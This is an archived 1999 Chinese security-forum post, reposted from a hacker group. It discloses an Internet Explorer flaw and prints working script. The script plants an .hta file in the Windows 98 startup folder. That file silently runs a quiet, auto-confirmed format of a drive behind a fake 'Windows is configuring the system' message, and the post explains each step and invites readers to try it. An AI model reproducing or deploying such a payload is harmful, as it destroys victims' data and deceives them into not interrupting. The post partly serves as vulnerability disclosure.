精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>Internet Explorer代码可以格式化本地硬(2)

主题:Internet Explorer代码可以格式化本地硬(2)
发信人: [email protected]()
整理人: (1999-11-09 18:33:35), 站内信件

 

        Internet Explorer代码可以格式化本地硬盘 

  先前的文章我们解释了hta(HTML application)在Web页面中是怎么在别人访
问站点的时候攻击你的
机器。现在,又有了个新的危险的例子,但这个例子里,攻击的对象只是作者自
己,千万不要拿别人的
宝贝机器来做你的实验品。

  用下面的代码(注意,这些代码是For Spanish Windows'98.要想让它在中文
或是英文版本下运行,
得做写改动,具体得自己动手啦~~~~)

  <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FB
FC"> 
  </object> 
  <SCRIPT> 
  scr.Reset(); 
  scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta"
;
  scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-0
0C04FD58A0B'></object>
<SCRIPT>wsh.Run('start /m format a: /q /autotest /u');alert('IMPORTANT
 : Windows is 
configuring the system. Plase do not interrupt this process.');</"+"SC
RIPT>";scr.write();

  代码的作者就把自己的D:,A:给格式化了,我嘛,还不敢试,哪位大哥够胆量
的就 帮小弟玩玩。

  这个代码是按如下工作的:
  1) 用start /m (Spanish Win98 版本),这个程序以最小化的方式运行,所
以用户不大会发现到。
  2) 用上参数 /autotest,它可能会在某个驱动器上自动运行Format.com(不会
问你Y/N的哦)
  3) 接着,就会有提示的message告诉你,"IMPORTANT : Windows is config
uring the system.
Please do not interrupt this process."

  这些都会隐藏最小化窗口里的Format信息。当然,它也会因为这个程序而会
被发现。

  很明显,这个漏洞是很危险的。想想你的drive里的好东东一下都没了,呵呵
,哭也来不及了。 

  本文由isbase成员编译或原创,如要转载请保持文章的完整性
  欢迎访问我们的站点http://www.isbase.com
  绿色兵团给你安全的保证


--
    我是[回合策略]版副,[宗教信仰]斑竹,欢迎大家常来坐坐。
    欢迎光临魔法师学院http://wwwmagic.126.com或shizhao.topcool.net
    *    *    *    *    *
            无挂碍故无有恐怖
                   --DOS--

※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 202.106.249.173]

[关闭][返回]